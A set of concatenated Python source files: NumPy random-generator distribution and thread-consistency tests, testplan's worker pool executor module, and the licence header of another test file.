assert_raises(ValueError, random.lognormal, mean, bad_sigma * 3)
def test_rayleigh(self):
scale = [1]
bad_scale = [-1]
desired = np.array([0.60439534475066, 0.66120048396359, 1.67873398389499])
random = Generator(MT19937(self.seed))
actual = random.rayleigh(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.rayleigh, bad_scale * 3)
def test_wald(self):
mean = [0.5]
scale = [1]
bad_mean = [0]
bad_scale = [-2]
desired = np.array([0.38052407392905, 0.50701641508592, 0.484935249864])
random = Generator(MT19937(self.seed))
actual = random.wald(mean * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.wald, bad_mean * 3, scale)
assert_raises(ValueError, random.wald, mean * 3, bad_scale)
random = Generator(MT19937(self.seed))
actual = random.wald(mean, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.wald, bad_mean, scale * 3)
assert_raises(ValueError, random.wald, mean, bad_scale * 3)
def test_triangular(self):
left = [1]
right = [3]
mode = [2]
bad_left_one = [3]
bad_mode_one = [4]
bad_left_two, bad_mode_two = right * 2
desired = np.array([1.57781954604754, 1.62665986867957, 2.30090130831326])
random = Generator(MT19937(self.seed))
triangular = random.triangular
actual = triangular(left * 3, mode, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one * 3, mode, right)
assert_raises(ValueError, triangular, left * 3, bad_mode_one, right)
assert_raises(ValueError, triangular, bad_left_two * 3, bad_mode_two,
right)
random = Generator(MT19937(self.seed))
triangular = random.triangular
actual = triangular(left, mode * 3, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode * 3, right)
assert_raises(ValueError, triangular, left, bad_mode_one * 3, right)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two * 3,
right)
random = Generator(MT19937(self.seed))
triangular = random.triangular
actual = triangular(left, mode, right * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode, right * 3)
assert_raises(ValueError, triangular, left, bad_mode_one, right * 3)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two,
right * 3)
assert_raises(ValueError, triangular, 10., 0., 20.)
assert_raises(ValueError, triangular, 10., 25., 20.)
assert_raises(ValueError, triangular, 10., 10., 10.)
def test_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
desired = np.array([0, 0, 1])
random = Generator(MT19937(self.seed))
binom = random.binomial
actual = binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n * 3, p)
assert_raises(ValueError, binom, n * 3, bad_p_one)
assert_raises(ValueError, binom, n * 3, bad_p_two)
random = Generator(MT19937(self.seed))
actual = random.binomial(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n, p * 3)
assert_raises(ValueError, binom, n, bad_p_one * 3)
assert_raises(ValueError, binom, n, bad_p_two * 3)
def test_negative_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
desired = np.array([0, 2, 1], dtype=np.int64)
random = Generator(MT19937(self.seed))
neg_binom = random.negative_binomial
actual = neg_binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n * 3, p)
assert_raises(ValueError, neg_binom, n * 3, bad_p_one)
assert_raises(ValueError, neg_binom, n * 3, bad_p_two)
random = Generator(MT19937(self.seed))
neg_binom = random.negative_binomial
actual = neg_binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n, p * 3)
assert_raises(ValueError, neg_binom, n, bad_p_one * 3)
assert_raises(ValueError, neg_binom, n, bad_p_two * 3)
def test_poisson(self):
lam = [1]
bad_lam_one = [-1]
desired = np.array([0, 0, 3])
random = Generator(MT19937(self.seed))
max_lam = random._poisson_lam_max
bad_lam_two = [max_lam * 2]
poisson = random.poisson
actual = poisson(lam * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, poisson, bad_lam_one * 3)
assert_raises(ValueError, poisson, bad_lam_two * 3)
def test_zipf(self):
a = [2]
bad_a = [0]
desired = np.array([1, 8, 1])
random = Generator(MT19937(self.seed))
zipf = random.zipf
actual = zipf(a * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, zipf, bad_a * 3)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, zipf, np.nan)
assert_raises(ValueError, zipf, [0, 0, np.nan])
def test_geometric(self):
p = [0.5]
bad_p_one = [-1]
bad_p_two = [1.5]
desired = np.array([1, 1, 3])
random = Generator(MT19937(self.seed))
geometric = random.geometric
actual = geometric(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, geometric, bad_p_one * 3)
assert_raises(ValueError, geometric, bad_p_two * 3)
def test_hypergeometric(self):
ngood = [1]
nbad = [2]
nsample = [2]
bad_ngood = [-1]
bad_nbad = [-2]
bad_nsample_one = [-1]
bad_nsample_two = [4]
desired = np.array([0, 0, 1])
random = Generator(MT19937(self.seed))
actual = random.hypergeometric(ngood * 3, nbad, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, random.hypergeometric, bad_ngood * 3, nbad, nsample)
assert_raises(ValueError, random.hypergeometric, ngood * 3, bad_nbad, nsample)
assert_raises(ValueError, random.hypergeometric, ngood * 3, nbad, bad_nsample_one)
assert_raises(ValueError, random.hypergeometric, ngood * 3, nbad, bad_nsample_two)
random = Generator(MT19937(self.seed))
actual = random.hypergeometric(ngood, nbad * 3, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, random.hypergeometric, bad_ngood, nbad * 3, nsample)
assert_raises(ValueError, random.hypergeometric, ngood, bad_nbad * 3, nsample)
assert_raises(ValueError, random.hypergeometric, ngood, nbad * 3, bad_nsample_one)
assert_raises(ValueError, random.hypergeometric, ngood, nbad * 3, bad_nsample_two)
random = Generator(MT19937(self.seed))
hypergeom = random.hypergeometric
actual = hypergeom(ngood, nbad, nsample * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, bad_nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_one * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_two * 3)
assert_raises(ValueError, hypergeom, -1, 10, 20)
assert_raises(ValueError, hypergeom, 10, -1, 20)
assert_raises(ValueError, hypergeom, 10, 10, -1)
assert_raises(ValueError, hypergeom, 10, 10, 25)
# ValueError for arguments that are too big.
assert_raises(ValueError, hypergeom, 2**30, 10, 20)
assert_raises(ValueError, hypergeom, 999, 2**31, 50)
assert_raises(ValueError, hypergeom, 999, [2**29, 2**30], 1000)
def test_logseries(self):
p = [0.5]
bad_p_one = [2]
bad_p_two = [-1]
desired = np.array([1, 1, 1])
random = Generator(MT19937(self.seed))
logseries = random.logseries
actual = logseries(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, logseries, bad_p_one * 3)
assert_raises(ValueError, logseries, bad_p_two * 3)
def test_multinomial(self):
random = Generator(MT19937(self.seed))
actual = random.multinomial([5, 20], [1 / 6.] * 6, size=(3, 2))
desired = np.array([[[0, 0, 2, 1, 2, 0],
[2, 3, 6, 4, 2, 3]],
[[1, 0, 1, 0, 2, 1],
[7, 2, 2, 1, 4, 4]],
[[0, 2, 0, 1, 2, 0],
[3, 2, 3, 3, 4, 5]]], dtype=np.int64)
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
actual = random.multinomial([5, 20], [1 / 6.] * 6)
desired = np.array([[0, 0, 2, 1, 2, 0],
[2, 3, 6, 4, 2, 3]], dtype=np.int64)
assert_array_equal(actual, desired)
class TestThread:
# make sure each state produces the same sequence even in threads
def setup(self):
self.seeds = range(4)
def check_function(self, function, sz):
from threading import Thread
out1 = np.empty((len(self.seeds),) + sz)
out2 = np.empty((len(self.seeds),) + sz)
# threaded generation
t = [Thread(target=function, args=(Generator(MT19937(s)), o))
for s, o in zip(self.seeds, out1)]
[x.start() for x in t]
[x.join() for x in t]
# the same serial
for s, o in zip(self.seeds, out2):
function(Generator(MT19937(s)), o)
# these platforms change x87 fpu precision mode in threads
if np.intp().dtype.itemsize == 4 and sys.platform == "win32":
assert_array_almost_equal(out1, out2)
else:
assert_array_equal(out1, out2)
def test_normal(self):
def gen_random(state, out):
out[...] = state.normal(size=10000)
self.check_function(gen_random, sz=(10000,))
def test_exp(self):
def gen_random(state, out):
out[...] = state.exponential(scale=np.ones((100, 1000)))
self.check_function(gen_random, sz=(100, 1000))
def test_multinomial(self):
def gen_random(state, out):
out[...] = state.multinomial(10, [1 / 6.] * 6, size=10000)
self.check_function(gen_random, sz=(10000, 6))
# See Issue #4263
class TestSingleEltArrayInput:
def setup(self):
self.argOne = np.array([2])
self.argTwo = np.array([3])
self.argThree = np.array([4])
self.tgtShape = (1,)
def test_one_arg_funcs(self):
funcs = (random.exponential, random.standard_gamma,
random.chisquare, random.standard_t,
random.pareto, random.weibull,
random.power, random.rayleigh,
random.poisson, random.zipf,
random.geometric, random.logseries)
probfuncs = (random.geometric, random.logseries)
for func in funcs:
if func in probfuncs: # p < 1.0
out = func(np.array([0.5]))
else:
out = func(self.argOne)
assert_equal(out.shape, self.tgtShape)
def test_two_arg_funcs(self):
funcs = (random.uniform, random.normal,
random.beta, random.gamma,
random.f, random.noncentral_chisquare,
random.vonmises, random.laplace,
random.gumbel, random.logistic,
random.lognormal, random.wald,
random.binomial, random.negative_binomial)
probfuncs = (random.binomial, random.negative_binomial)
for func in funcs:
if func in probfuncs: # p <= 1
argTwo = np.array([0.5])
else:
argTwo = self.argTwo
out = func(self.argOne, argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, argTwo[0])
assert_equal(out.shape, self.tgtShape)
def test_integers(self, endpoint):
itype = [np.bool_, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
func = random.integers
high = np.array([1])
low = np.array([0])
for dt in itype:
out = func(low, high, endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
out = func(low[0], high, endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
out = func(low, high[0], endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
def test_three_arg_funcs(self):
funcs = [random.noncentral_f, random.triangular,
random.hypergeometric]
for func in funcs:
out = func(self.argOne, self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, self.argTwo[0], self.argThree)
assert_equal(out.shape, self.tgtShape)
@pytest.mark.parametrize("config", JUMP_TEST_DATA)
def test_jumped(config):
# Each config contains the initial seed, a number of raw steps
# the md5 hashes of the initial and the final states' keys and
# the position of of the initial and the final state.
# These were produced using the original C implementation.
seed = config["seed"]
steps = config["steps"]
mt19937 = MT19937(seed)
# Burn step
mt19937.random_raw(steps)
key = mt19937.state["state"]["key"]
if sys.byteorder == 'big':
key = key.byteswap()
md5 = hashlib.md5(key)
assert mt19937.state["state"]["pos"] == config["initial"]["pos"]
assert md5.hexdigest() == config["initial"]["key_md5"]
jumped = mt19937.jumped()
key = jumped.state["state"]["key"]
if sys.byteorder == 'big':
key = key.byteswap()
md5 = hashlib.md5(key)
assert jumped.state["state"]["pos"] == config["jumped"]["pos"]
assert md5.hexdigest() == config["jumped"]["key_md5"]
|
base.py | """Worker pool executor base classes."""
import os
import numbers
import threading
import time
import datetime
import pprint
import traceback
import queue
from schema import Or, And, Use
from testplan.common.config import ConfigOption, validate_func
from testplan.common import entity
from testplan.common.utils.thread import interruptible_join
from testplan.common.utils.timing import wait_until_predicate
from testplan.common.utils import strings
from testplan.runners.base import Executor, ExecutorConfig
from testplan.report import ReportCategories
from .communication import Message
from .connection import QueueClient, QueueServer
from .tasks import Task, TaskResult
from testplan.common.entity import ResourceStatus
class WorkerConfig(entity.ResourceConfig):
"""
Configuration object for
:py:class:`~testplan.runners.pools.base.Worker` resource entity.
"""
@classmethod
def get_options(cls):
"""
Schema for options validation and assignment of default values.
"""
return {
"index": Or(int, str),
ConfigOption("transport", default=QueueClient): object,
ConfigOption("restart_count", default=3): int,
}
class Worker(entity.Resource):
"""
Worker resource that pulls tasks from the transport provided, executes them
and sends back task results.
:param index: Worker index id.
:type index: ``int`` or ``str``
:param transport: Transport class for pool/worker communication.
:type transport: :py:class:`~testplan.runners.pools.connection.Client`
:param restart_count: How many times a worker in pool can be restarted.
:type restart_count: ``int``
Also inherits all :py:class:`~testplan.common.entity.base.Resource`
options.
"""
CONFIG = WorkerConfig
def __init__(self, **options):
super(Worker, self).__init__(**options)
self._metadata = None
self._transport = self.cfg.transport()
self._handler = None
self.last_heartbeat = None
self.assigned = set()
self.requesting = 0
self.restart_count = self.cfg.restart_count
@property
def handler(self):
return self._handler
@property
def transport(self):
"""Pool/Worker communication transport."""
return self._transport
@property
def metadata(self):
"""Worker metadata information."""
if not self._metadata:
self._metadata = {
"thread": threading.current_thread(),
"index": self.cfg.index,
}
return self._metadata
@property
def outfile(self):
"""Stdout file."""
return os.path.join(
self.parent.runpath, "{}_startup".format(self.cfg.index)
)
def uid(self):
"""Worker unique index."""
return self.cfg.index
def starting(self):
"""Starts the daemonic worker loop."""
self.make_runpath_dirs()
self._handler = threading.Thread(
target=self._loop, args=(self._transport,)
)
self._handler.daemon = True
self._handler.start()
self.status.change(self.STATUS.STARTED)
def stopping(self):
"""Stops the worker."""
if self._handler:
interruptible_join(self._handler)
self._handler = None
self.status.change(self.STATUS.STOPPED)
def aborting(self):
"""Aborting logic, will not wait running tasks."""
self._transport.disconnect()
@property
def is_alive(self):
"""Poll the loop handler thread to check it is running as expected."""
return self._handler.is_alive()
def _loop(self, transport):
message = Message(**self.metadata)
while self.active and self.status.tag not in (
self.status.STOPPING,
self.status.STOPPED,
):
received = transport.send_and_receive(
message.make(message.TaskPullRequest, data=1)
)
if received is None or received.cmd == Message.Stop:
break
elif received.cmd == Message.TaskSending:
results = []
for item in received.data:
results.append(self.execute(item))
transport.send_and_receive(
message.make(message.TaskResults, data=results),
expect=message.Ack,
)
elif received.cmd == Message.Ack:
pass
time.sleep(self.cfg.active_loop_sleep)
def execute(self, task):
"""
Executes a task and return the associated task result.
:param task: Task that worker pulled for execution.
:type task: :py:class:`~testplan.runners.pools.tasks.base.Task`
:return: Task result.
:rtype: :py:class:`~testplan.runners.pools.tasks.base.TaskResult`
"""
try:
runnable = task.materialize()
if isinstance(runnable, entity.Runnable):
if not runnable.parent:
runnable.parent = self
if not runnable.cfg.parent:
runnable.cfg.parent = self.cfg
result = runnable.run()
except BaseException:
task_result = TaskResult(
task=task,
result=None,
status=False,
reason=traceback.format_exc(),
)
else:
task_result = TaskResult(task=task, result=result, status=True)
return task_result
def respond(self, msg):
"""
Method that the pool uses to respond with a message to the worker.
:param msg: Response message.
:type msg: :py:class:`~testplan.runners.pools.communication.Message`
"""
self._transport.respond(msg)
def __repr__(self):
return "{}[{}]".format(self.__class__.__name__, self.cfg.index)
class PoolConfig(ExecutorConfig):
"""
Configuration object for
:py:class:`~testplan.runners.pools.base.Pool` executor resource entity.
"""
@classmethod
def get_options(cls):
"""
Schema for options validation and assignment of default values.
"""
return {
"name": str,
ConfigOption("size", default=4): And(int, lambda x: x > 0),
ConfigOption("worker_type", default=Worker): object,
ConfigOption("worker_heartbeat", default=None): Or(
int, float, None
),
ConfigOption("heartbeats_miss_limit", default=3): int,
ConfigOption("restart_count", default=3): int,
ConfigOption("max_active_loop_sleep", default=5): numbers.Number,
ConfigOption("allow_task_rerun", default=True): bool,
}
class Pool(Executor):
"""
Pool task executor object that initializes workers and dispatches tasks.
:param name: Pool name.
:type name: ``str``
:param size: Pool workers size. Default: 4
:type size: ``int``
:param worker_type: Type of worker to be initialized.
:type worker_type: :py:class:`~testplan.runners.pools.base.Worker`
:param worker_heartbeat: Worker heartbeat period.
:type worker_heartbeat: ``int`` or ``float`` or ``NoneType``
:param heartbeats_miss_limit: Maximum times a heartbeat is missed.
:type heartbeats_miss_limit: ``int``
:param restart_count: How many times a worker in pool can be restarted.
:type restart_count: ``int``
:param max_active_loop_sleep: Maximum value for delay logic in active sleep.
:type max_active_loop_sleep: ``int`` or ``float``
:param allow_task_rerun: Whether allow task to rerun when executing in this pool
:type allow_task_rerun: ``bool``
Also inherits all :py:class:`~testplan.runners.base.Executor` options.
"""
CONFIG = PoolConfig
CONN_MANAGER = QueueServer
def __init__(
self,
name,
size=4,
worker_type=Worker,
worker_heartbeat=None,
heartbeats_miss_limit=3,
restart_count=3,
max_active_loop_sleep=5,
allow_task_rerun=True,
**options
):
options.update(self.filter_locals(locals()))
super(Pool, self).__init__(**options)
self.unassigned = queue.PriorityQueue() # unassigned tasks
self._executed_tests = []
self._task_retries_cnt = {} # uid: times_reassigned_without_result
self._task_retries_limit = 2
self._workers = entity.Environment(parent=self)
self._workers_last_result = {}
self._conn = self.CONN_MANAGER()
self._conn.parent = self
self._pool_lock = threading.Lock()
self._metadata = None
# Set when Pool is started.
self._exit_loop = False
self._start_monitor_thread = True
# Methods for handling different Message types. These are expected to
# take the worker, request and response objects as the only required
# positional args.
self._request_handlers = {
Message.ConfigRequest: self._handle_cfg_request,
Message.TaskPullRequest: self._handle_taskpull_request,
Message.TaskResults: self._handle_taskresults,
Message.Heartbeat: self._handle_heartbeat,
Message.SetupFailed: self._handle_setupfailed,
}
def uid(self):
"""Pool name."""
return self.cfg.name
def add(self, task, uid):
"""
Add a task for execution.
:param task: Task to be scheduled to workers.
:type task: :py:class:`~testplan.runners.pools.tasks.base.Task`
:param uid: Task uid.
:type uid: ``str``
"""
if not isinstance(task, Task):
raise ValueError(
"Task was expected, got {} instead.".format(type(task))
)
super(Pool, self).add(task, uid)
self.unassigned.put((task.priority, uid))
self._task_retries_cnt[uid] = 0
def _can_assign_task(self, task):
"""
Is this pool able to execute the task.
:param task: Task to be scheduled to pool.
:type task: :py:class:`~testplan.runners.pools.tasks.base.Task`
:return: True if can assign task to pool, otherwise False
:rtype: ``bool``
"""
return True
def _can_assign_task_to_worker(self, task, worker):
"""
When a worker requests a task, it is necessary to verify that
the worker is suitable to execute the task.
:param task: Task to be scheduled to worker.
:type task: :py:class:`~testplan.runners.pools.tasks.base.Task`
:param worker: A worker created by pool executor.
:type worker: :py:class:`~testplan.runners.pools.base.Worker`
:return: True if can assign task to worker, otherwise False
:rtype: ``bool``
"""
return True
def _loop(self):
"""
Main executor work loop - runs in a separate thread when the Pool is
started.
"""
if self._start_monitor_thread:
self.logger.debug("Starting worker monitor thread.")
self._worker_monitor = threading.Thread(
target=self._workers_monitoring
)
self._worker_monitor.daemon = True
self._worker_monitor.start()
while self.active and not self._exit_loop:
msg = self._conn.accept()
if msg:
try:
self.handle_request(msg)
except Exception:
self.logger.error(traceback.format_exc())
time.sleep(self.cfg.active_loop_sleep)
def handle_request(self, request):
"""
Handles a worker request. I.e TaskPull, TaskResults, Heartbeat etc.
:param request: Worker request.
:type request: :py:class:`~testplan.runners.pools.communication.Message`
"""
sender_index = request.sender_metadata["index"]
worker = self._workers[sender_index]
self.logger.debug(
"Pool %s received message from worker %s - %s, %s",
self.cfg.name,
worker,
request.cmd,
request.data,
)
if not worker.active:
self.logger.warning(
"Message from inactive worker %s - %s, %s",
worker,
request.cmd,
request.data,
)
response = Message(**self._metadata)
if not self.active or self.status.tag == self.STATUS.STOPPING:
worker.respond(response.make(Message.Stop))
elif request.cmd in self._request_handlers:
try:
self._request_handlers[request.cmd](worker, request, response)
except Exception:
self.logger.error(traceback.format_exc())
self.logger.debug(
"Not able to handle request from worker, sending Stop cmd"
)
worker.respond(response.make(Message.Stop))
else:
self.logger.error(
"Unknown request: {} {} {} {}".format(
request, dir(request), request.cmd, request.data
)
)
worker.respond(response.make(Message.Ack))
def _handle_cfg_request(self, worker, _, response):
"""Handle a ConfigRequest from a worker."""
options = []
cfg = self.cfg
while cfg:
options.append(cfg.denormalize())
cfg = cfg.parent
worker.respond(response.make(Message.ConfigSending, data=options))
def _handle_taskpull_request(self, worker, request, response):
"""Handle a TaskPullRequest from a worker."""
tasks = []
if self.status.tag == self.status.STARTED:
for _ in range(request.data):
try:
priority, uid = self.unassigned.get_nowait()
except queue.Empty:
break
task = self._input[uid]
if self._can_assign_task(task):
if self._task_retries_cnt[uid] > self._task_retries_limit:
self._discard_task(
uid,
"{} already reached max retries limit: {}".format(
self._input[uid], self._task_retries_limit
),
)
continue
else:
if self._can_assign_task_to_worker(task, worker):
self.logger.test_info(
"Scheduling {} to {}{}".format(
task,
worker,
" (rerun {})".format(task.reassign_cnt)
if task.reassign_cnt > 0
else "",
)
)
worker.assigned.add(uid)
tasks.append(task)
task.executors.setdefault(self.cfg.name, set())
task.executors[self.cfg.name].add(worker.uid())
self.record_execution(uid)
else:
self.logger.test_info(
"Cannot schedule {} to {}".format(task, worker)
)
self.unassigned.put((task.priority, uid))
self._task_retries_cnt[uid] += 1
else:
# Later may create a default local pool as failover option
self._discard_task(
uid,
"{} cannot be executed in {}".format(
self._input[uid], self
),
)
if tasks:
worker.respond(response.make(Message.TaskSending, data=tasks))
worker.requesting = request.data - len(tasks)
return
worker.requesting = request.data
worker.respond(response.make(Message.Ack))
def _handle_taskresults(self, worker, request, response):
"""Handle a TaskResults message from a worker."""
def task_should_rerun():
if not self.cfg.allow_task_rerun:
return False
if not task_result.task:
return False
if task_result.task.rerun == 0:
return False
result = task_result.result
if (
task_result.status
and result
and result.run
and result.report.passed
):
return False
if task_result.task.reassign_cnt >= task_result.task.rerun:
self.logger.test_info(
"Will not rerun %(input)s again as it already "
"reached max rerun limit %(reruns)d",
{
"input": self._input[uid],
"reruns": task_result.task.rerun,
},
)
return False
return True
worker.respond(response.make(Message.Ack))
for task_result in request.data:
uid = task_result.task.uid()
worker.assigned.remove(uid)
self._workers_last_result.setdefault(worker, time.time())
self.logger.test_info(
"De-assign {} from {}".format(task_result.task, worker)
)
if task_should_rerun():
self.logger.test_info(
"Will rerun %(task)s for max %(rerun)d more times",
{
"task": task_result.task,
"rerun": task_result.task.rerun
- task_result.task.reassign_cnt,
},
)
self.unassigned.put((task_result.task.priority, uid))
self._task_retries_cnt[uid] = 0
self._input[uid].reassign_cnt += 1
# Will rerun task, but still need to retain the result
self._append_temporary_task_result(task_result)
continue
self._print_test_result(task_result)
self._results[uid] = task_result
self.ongoing.remove(uid)
def _handle_heartbeat(self, worker, request, response):
"""Handle a Heartbeat message received from a worker."""
worker.last_heartbeat = time.time()
self.logger.debug(
"Received heartbeat from {} at {} after {}s.".format(
worker, request.data, time.time() - request.data
)
)
worker.respond(response.make(Message.Ack, data=worker.last_heartbeat))
def _handle_setupfailed(self, worker, request, response):
"""Handle a SetupFailed message received from a worker."""
self.logger.test_info(
"Worker {} setup failed:{}{}".format(
worker, os.linesep, request.data
)
)
worker.respond(response.make(Message.Ack))
self._decommission_worker(worker, "Aborting {}, setup failed.")
def _decommission_worker(self, worker, message):
"""
Decommission a worker by move all assigned task back to pool
"""
self.logger.critical(message.format(worker))
if os.path.exists(worker.outfile):
self.logger.critical("\tlogfile: {}".format(worker.outfile))
while worker.assigned:
uid = worker.assigned.pop()
task = self._input[uid]
self.logger.test_info(
"Re-collect {} from {} to {}.".format(task, worker, self)
)
self.unassigned.put((task.priority, uid))
self._task_retries_cnt[uid] += 1
def _workers_monitoring(self):
"""
Worker fault tolerance logic. Check is based on:
1) handler status
2) heartbeat if available
"""
previous_status = {"active": [], "inactive": [], "initializing": []}
loop_interval = self.cfg.worker_heartbeat or 5 # seconds
break_outer_loop = False
while self.active:
hosts_status = {"active": [], "inactive": [], "initializing": []}
for worker in self._workers:
status, reason = self._query_worker_status(worker)
if status == "inactive":
with self._pool_lock:
if self.active and self.status.tag not in (
self.status.STOPPING,
self.status.STOPPED,
):
if self._handle_inactive(worker, reason):
status = "active"
else:
# if pool is aborting/stopping, exit monitor
break_outer_loop = True
break
hosts_status[status].append(worker)
if break_outer_loop:
break
if hosts_status != previous_status:
self.logger.info(
"%s Hosts status update", datetime.datetime.now()
)
self.logger.info(pprint.pformat(hosts_status))
previous_status = hosts_status
if (
not hosts_status["active"]
and not hosts_status["initializing"]
and hosts_status["inactive"]
):
self.logger.critical(
"All workers of {} are inactive.".format(self)
)
self.abort()
break
try:
# For early finish of worker monitoring thread.
wait_until_predicate(
lambda: not self.is_alive,
timeout=loop_interval,
interval=0.05,
)
except RuntimeError:
break
def _query_worker_status(self, worker):
"""
Query the current status of a worker. If heartbeat monitoring is
enabled, check the last heartbeat time is within threshold.
:param worker: Pool worker to query
:return: worker status string - one of 'initializing', 'inactive' or
'active', and an optional reason string
"""
if not worker.active or worker.status.tag in (
worker.status.STOPPING,
worker.status.STOPPED,
):
return "inactive", "Worker {} in stop/abort status"
if worker.status.tag in (worker.status.NONE, worker.status.STARTING):
return "initializing", None
# else: worker must be in state STARTED
if worker.status.tag != worker.status.STARTED:
raise RuntimeError(
"Worker in unexpected state {}".format(worker.status.tag)
)
if not worker.is_alive: # handler based monitoring
return (
"inactive",
"Decommission {}, handler no longer alive".format(worker),
)
# If no heartbeart is configured, we treat the worker as "active"
# since it is in state STARTED and its handler is alive.
if not self.cfg.worker_heartbeat:
return "active", None
# else: do heartbeat based monitoring
lag = time.time() - worker.last_heartbeat
if lag > self.cfg.worker_heartbeat * self.cfg.heartbeats_miss_limit:
return (
"inactive",
"Has not been receiving heartbeat from {} for {} "
"sec".format(worker, lag),
)
return "active", None
def _handle_inactive(self, worker, reason):
"""
Handle an inactive worker.
:param worker: worker object
:type worker: :py:class:`~testplan.runners.pool.base.Worker`
:param reason: why worker is considered inactive
:type reason: ``str``
:return: True if worker restarted, else False
:rtype: ``bool``
"""
if worker.status.tag != worker.status.STARTED:
return False
self._decommission_worker(worker, reason)
if worker.restart_count:
worker.restart_count -= 1
try:
worker.restart()
return True
except Exception as exc:
self.logger.critical(
"Worker {} failed to restart: {}".format(worker, exc)
)
else:
worker.abort()
return False
def _discard_task(self, uid, reason):
self.logger.critical(
"Discard task {} of {} - {}.".format(
self._input[uid], self, reason
)
)
self._results[uid] = TaskResult(
task=self._input[uid],
status=False,
reason="Task discarded by {} - {}.".format(self, reason),
)
self.ongoing.remove(uid)
def _discard_pending_tasks(self):
self.logger.critical("Discard pending tasks of {}.".format(self))
while self.ongoing:
uid = self.ongoing[0]
self._results[uid] = TaskResult(
task=self._input[uid],
status=False,
reason="Task [{}] discarding due to {} abort.".format(
self._input[uid]._target, self
),
)
self.ongoing.pop(0)
def _append_temporary_task_result(self, task_result):
"""If a task should rerun, append the task result already fetched."""
test_report = task_result.result.report
uid = task_result.task.uid()
if uid not in self._task_retries_cnt:
return
postfix = " => Run {}".format(task_result.task.reassign_cnt)
test_report.name = "{}{}".format(test_report.name, postfix)
test_report.uid = "{}{}".format(test_report.uid, postfix)
test_report.category = ReportCategories.TASK_RERUN
test_report.status_override = "xfail"
new_uuid = strings.uuid4()
self._results[new_uuid] = task_result
self.parent._tests[new_uuid] = self.cfg.name
self.record_execution(new_uuid)
def _print_test_result(self, task_result):
if (not isinstance(task_result.result, entity.RunnableResult)) or (
not hasattr(task_result.result, "report")
):
return
# Currently prints report top level result and not details.
name = task_result.result.report.name
self.logger.log_test_status(name, task_result.result.report.status)
def _add_workers(self):
"""Initialise worker instances."""
for idx in (str(i) for i in range(self.cfg.size)):
worker = self.cfg.worker_type(
index=idx,
restart_count=self.cfg.restart_count,
active_loop_sleep=0.01,
)
worker.parent = self
worker.cfg.parent = self.cfg
self._workers.add(worker, uid=idx)
self.logger.debug(
"Added worker %(index)s (outfile = %(outfile)s)",
{"index": idx, "outfile": worker.outfile},
)
def _start_workers(self):
"""Start all workers of the pool"""
for worker in self._workers:
self._conn.register(worker)
self._workers.start()
def starting(self):
"""Starting the pool and workers."""
# TODO do we need a lock here?
self.make_runpath_dirs()
if self.runpath is None:
raise RuntimeError("runpath was not set correctly")
self._metadata = {"runpath": self.runpath}
self._conn.start()
for worker in self._workers:
# reset worker (if any) status
worker.status.change(ResourceStatus.STARTING)
self._exit_loop = False
super(Pool, self).starting() # start the loop & monitor
if not self._workers:
self._add_workers()
self._start_workers()
if self._workers.start_exceptions:
for msg in self._workers.start_exceptions.values():
self.logger.error(msg)
self.abort()
raise RuntimeError(
"All workers of {} failed to start.".format(self)
)
self.status.change(self.status.STARTED)
self.logger.debug("%s started.", self.__class__.__name__)
def workers_requests(self):
"""Count how many tasks workers are requesting."""
return sum(worker.requesting for worker in self._workers)
def _stop_workers(self):
self._workers.stop()
def stopping(self):
"""Stop connections and workers."""
with self._pool_lock:
self._stop_workers()
for worker in self._workers:
worker.transport.disconnect()
self._exit_loop = True
super(Pool, self).stopping() # stop the loop and the monitor
self._conn.stop()
self.status.change(self.status.STOPPED)
self.logger.debug("Stopped %s", self.__class__.__name__)
def abort_dependencies(self):
"""Empty generator to override parent implementation."""
return
yield
def aborting(self):
"""Aborting logic."""
self.logger.debug("Aborting pool {}".format(self))
for worker in self._workers:
worker.abort()
super(Pool, self).stopping() # stop the loop and the monitor
self._conn.abort()
self._discard_pending_tasks()
self.logger.debug("Aborted pool {}".format(self))
def record_execution(self, uid):
self._executed_tests.append(uid)
|
test_incoming.py | # -*- encoding: utf-8 -*-
#
# Copyright © 2017 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
